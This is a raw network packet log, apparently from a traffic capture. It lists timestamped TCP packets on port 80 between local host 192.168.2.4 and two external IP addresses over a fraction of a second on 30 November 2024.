Nov 30, 2024 04:06:54.248924017 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.248972893 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.249037027 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.250049114 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.250148058 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.250262022 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.251154900 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.251199961 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.251270056 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.252260923 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.252304077 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.252393961 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.253381014 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.253424883 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.253479004 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.254488945 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.254539013 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.254591942 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.255609035 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.255661011 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.255745888 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.256715059 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.256748915 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.256818056 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.257821083 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.257868052 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.257903099 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.258922100 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.259035110 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.259593010 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.260082960 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.260130882 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.260152102 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.261151075 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.261197090 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.261231899 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.262250900 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.262351036 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.262422085 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.263365984 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.263412952 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.263465881 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.264496088 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.264544964 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.264591932 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.265633106 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.265669107 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.265675068 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.265680075 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.265809059 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.265850067 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.265925884 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.266192913 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.266246080 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.266328096 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.266382933 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.266700029 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.266743898 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.266752005 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.267277002 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.267333031 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.267386913 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.267435074 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.267796040 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.267841101 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.267911911 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.268362045 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.268408060 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.268456936 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.268567085 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.268914938 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.268937111 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.268966913 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.269448042 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.269551992 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.269593954 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.269593954 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.270021915 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.270066023 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.270136118 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.270545006 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.270596027 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.270617008 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.270756006 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.271153927 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.271198034 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.271275997 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.271631956 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.271682024 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.271713018 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.271763086 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.272241116 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.272279978 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.272346973 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.272716999 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.272759914 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.272814989 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.272888899 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.273355961 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.273399115 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.273453951 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.273806095 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.273849010 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.273914099 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.273963928 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.274473906 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.274512053 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.274578094 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.274885893 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.274940968 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.274971962 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.275037050 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.275584936 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.275623083 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.275684118 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.275973082 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.276031017 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.276086092 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.276146889 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.276678085 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.276724100 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.276783943 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.277059078 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.277101994 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.277163029 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.277209997 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.277796984 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.277842999 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.277940035 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.278145075 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.278191090 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.278239012 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.278285980 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.278911114 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.278955936 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.279011011 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.279233932 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.279282093 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.279335022 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.279381990 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.280025959 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.280071020 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.280129910 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.280323029 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.280370951 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.280433893 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.280493021 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.281150103 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.281193972 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.281248093 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.281408072 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.281455994 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.281500101 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.281559944 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.282203913 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.282520056 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.282623053 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.283242941 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.283415079 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.283581018 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.283696890 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.283833981 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.284689903 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.284745932 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.284754038 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.284806967 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.285751104 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.285799980 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.285873890 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.285948038 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.286842108 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.286891937 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.286957979 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.287008047 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.287921906 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.287970066 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.288038969 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.288089037 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.289040089 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.289093018 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.289128065 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.289186001 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.290105104 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.290153980 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.290208101 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.290257931 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.291207075 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.291266918 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.291296959 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.291352034 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.292289972 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.292341948 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.292424917 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.292474031 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.293371916 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.293421984 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.293482065 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.293529987 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.294445038 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.294497013 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.294528008 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.294641972 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.295559883 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.295607090 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.295666933 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.295716047 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.296637058 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.296708107 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.296785116 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.296829939 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.297702074 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.297749043 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.297827959 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.297873974 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.298794985 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.298841953 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.298878908 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.298928976 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.299895048 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.299995899 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.300017118 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.300064087 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.300983906 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.301035881 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.301143885 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.301192999 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.302067041 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.302120924 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.302191019 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.302282095 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.303154945 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.303200006 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.303278923 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.303379059 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.304254055 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.304302931 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.304348946 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.304403067 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.305344105 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.305404902 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.305553913 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.305598021 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.306667089 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.306713104 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.306792021 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.306916952 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.307502031 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.307550907 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.307599068 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.307647943 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.308607101 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.308708906 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.308825970 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.309684038 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.309731007 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.309791088 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.309842110 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.310781002 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.310836077 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.310867071 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.310913086 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.311846972 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.311892033 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.311960936 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.311999083 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.312921047 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.312971115 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.313033104 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.313077927 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.314016104 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.314068079 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.314127922 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.314177990 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.315116882 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.315165043 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.315241098 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.315289974 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.316201925 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.316251993 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.316282034 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.316386938 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.317316055 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.317365885 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.317421913 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.317471027 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.318371058 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.318419933 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.318463087 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.318512917 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.319454908 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.319508076 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.319554090 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.319602966 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.320568085 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.320615053 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.320692062 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.320743084 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.321670055 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.321687937 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.321721077 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.321732998 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.322647095 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.322699070 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.402848959 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.402936935 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.403512001 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.403554916 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.403613091 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.403662920 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.404505968 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.404558897 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.404602051 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.405612946 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.428617001 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.428658009 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.428832054 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.429250956 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.429414034 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.429438114 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.430288076 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.430417061 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.431397915 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.431500912 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.432491064 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.432686090 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.433630943 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.433743954 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.434752941 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.434869051 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.435831070 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.435973883 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.436938047 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.437062979 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.437082052 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.437328100 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.437452078 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.438067913 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.438183069 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.439179897 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.439300060 CET	80	49894	185.215.113.16	192.168.2.4
